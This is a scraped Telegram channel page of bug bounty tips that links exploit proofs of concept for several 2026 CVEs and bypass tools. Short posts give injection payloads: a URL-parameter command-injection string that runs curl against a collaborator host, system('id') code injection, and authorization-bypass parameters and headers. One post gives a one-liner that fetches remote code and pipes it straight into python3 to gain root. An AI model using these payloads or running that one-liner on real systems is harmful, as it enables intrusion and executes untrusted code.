Brut Security 2.0
رفتن به کانال در Telegram
Bringing you Bug Bounty Video POCs from top hunters around the globe!
نمایش بیشتر4 514
مشترکین
-224 ساعت
+137 روز
-130 روز
آرشیو پست ها
4 511
Repost from Brut Security
👉👉👉👉Please don’t forget to react to the post and share it. Your reactions motivate us to post more content like this. You can also tap the ⭐️ to show your support. Thanks!😋😋😋
4 511
Repost from Brut Security
😈Turn your Burp Suite findings into clean, professional cards, ready for reports, bug bounty submissions, and social sharing.
🚨https://github.com/JFOZ1010/repshot
4 511
+2
Hye Hunter's,
DarkShadow is here back again!
Blind RCE in load model💀
if you see any endpoint which load model/function from client side try:
1) you can find ../../ FLI easily 2) system('id'); php functions for code injection 3) \"exec\" try blind rce using your burpcollabguy's you can join my new youtube channel i'll upload here reguler videos youtube.com/@darkshadow2bd #rce # bugbounty # bugbountytips
4 511
Hey Hunter's,
DarkShadow is here back again!
Just now, I’ve dropped a new tool on GitHub that can hide anything inside nothing!
This is called Project-Invisible. Here’s the GitHub link:
https://github.com/darkshadow2bd/Project-Invisible
And don’t miss the full video on my YouTube channel:
https://youtu.be/t4yTY0Cg6Ds?si=ZG99_pev06yZFHGi
If you’re interested, you can join my YouTube channel. I’ll upload my methods regulerly in YouTube videos if you guys join here.
#tools #bugbountytips
4 511
+1
Hey Hunter's,
DarkShadow is here back again!
?url= ❌SSRF, ✅RCE
If you find a parameter that passes through the URL, before testing for SSRF, try testing for RCE.
1. bypass: ?url=http://x"; [now add here your blind rce payload] 2. payload: curl${IFS}burp-collab-link;#Now, guys, if you genuinely enjoy reading such methods, show your appreciation. I’ll soon publish a very interesting tool! And Don't forget to follow me x.com/darkshadow2bd #rce #bugbounty #bugbountytips
4 511
Repost from Brut Security
🦊 GRAFANA FINAL SCANNER v2.0
😈https://github.com/Zierax/Grafana-Final-Scanner
4 511
Repost from Brut Security
⚠️CVE-2026-42945: RCE Proof of concept for CVE-2026-42945, a critical heap buffer overflow in NGINX's ngx_http_rewrite_module introduced in 2008
GitHub: https://github.com/depthfirstdisclosures/nginx-rift
4 511
Repost from Brut Security
A collection of AI agent prompts for bug bounty and pentesting workflows:
https://github.com/matty69v/Bug-Bounty-Agents
4 511
Repost from Brut Security
🦊Sharing again 10 free access - https://topmate.io/saumadip/2009859?coupon_code=asas
4 511
Hey Hunter’s,
DarkShadow is here back again!
if you got any api endpoint and showing you unauthorized then use fake perameter like:
/api/public = unauthorized /api/public/latest?anything=/api/publicyou can FUZZ like: ?admin=true, ?bypass=1, debug=true, OR try to add header “X-Custom-IP-Authorization: 127.0.0.1” these are some underrated but very effective method which i use to check api endpoints. if you guy’s really enjoy to read such method then show your love to react here 🔥❤️
4 511
Repost from Brut Security
⚡️PoC collection of Atlassian(Jira, Confluence, Bitbucket) products and Jenkins, Solr, Nexus,etc
✅http://github.com/shadowsock5/Poc
4 511
Repost from Brut Security
🔔 A PoC/exploit has been discovered for vulnerability CVE-2026-35616
PT ID: PT-2026-30288
Vendor: Fortinet
Product: FortiClientEMS
Description: A improper access control vulnerability in Fortinet FortiClientEMS 7.4.5 through 7.4.6 may allow an unauthenticated attacker to execute unauthorized code or commands via crafted requests.
Link: https://github.com/Alaatk/CVE-2026-35616
4 511
Repost from Brut Security
⚠️403 bypass tools for bug bounty hunters:
bypass-403 → https://github.com/iamj0ker/bypass-403
nomore403 → https://github.com/devploit/nomore403
4-ZERO-3 → https://github.com/Dheerajmadhukar/4-ZERO-3
byp4xx → https://github.com/lobuhi/byp4xx
dontgo403 → https://github.com/mbrg/dontgo403
4 511
🚨 cPanelSniper — CVE-2026-41940
cPanel & WHM'de CVSS 10.0 kritik auth bypass.
CRLF injection → session file poisoning → root WHM access.
https://github.com/ynsmroztas/cPanelSniper
4 511
Repost from Brut Security
🥺 If you found the posts helpful, drop a like on the post.
It helps us reach more people and keeps us motivated to share better content.
4 511
Repost from Brut Security
🔥CVE-2026-41940 cPanel/WHM Authentication Bypass - Detection Artifact Generator
🚨https://github.com/watchtowrlabs/watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py
4 511
Repost from Brut Security
Behind every secure system,
there’s someone putting in the work no one sees.
Late nights, constant learning, silent defense.
This Labour Day, we salute every ethical hacker, analyst, and learner building a safer digital world.
Respect the grind.
Happy Labour Day.
#LabourDay #CyberSecurity #EthicalHacking #BrutSecurity
4 511
Hey Hunter's,
DarkShadow is here back again!
🚨History Breaking exploit😳
CVE-2026-31431 (nickname: copy fail)
A Linux Privilege Escalation in all the major OS, hidden in the kernel for 9 years and discovered by an Ai !!!
Exploit code:
curl copy.fail/exp | python3 && suGuys, AI is going to be very dangerous😨 Don't forget to follow me x.com/darkshadow2bd #exploit #bugbountytips #linux
اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
